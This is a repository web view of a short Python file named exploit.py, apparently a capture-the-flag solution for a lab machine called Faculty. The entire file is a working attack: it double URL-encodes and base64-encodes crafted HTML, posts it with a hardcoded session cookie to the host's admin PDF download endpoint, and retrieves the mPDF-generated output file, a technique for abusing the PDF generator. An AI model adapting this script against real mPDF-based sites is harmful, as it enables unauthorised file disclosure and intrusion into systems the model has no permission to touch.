aboutsummaryrefslogtreecommitdiff
path: root/faculty/exploit.py
blob: 5bda40dd99d27130b29cff56581e7a8740002d1d (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
import urllib.parse
import urllib.request
import base64
import requests
import os

with open('code.html') as h:
    code = h.read().strip()
ueCode = urllib.parse.quote(urllib.parse.quote(code))
b64enc = base64.b64encode(ueCode.encode("ascii")).decode('UTF-8')

r = requests.post('http://faculty.htb/admin/download.php', data={"pdf": b64enc}, cookies={"PHPSESSID": "s7qhujjj9qmqoeju6enate61nj"})

urllib.request.urlretrieve(f'http://faculty.htb/mpdf/tmp/{r.text}', 'file.pdf')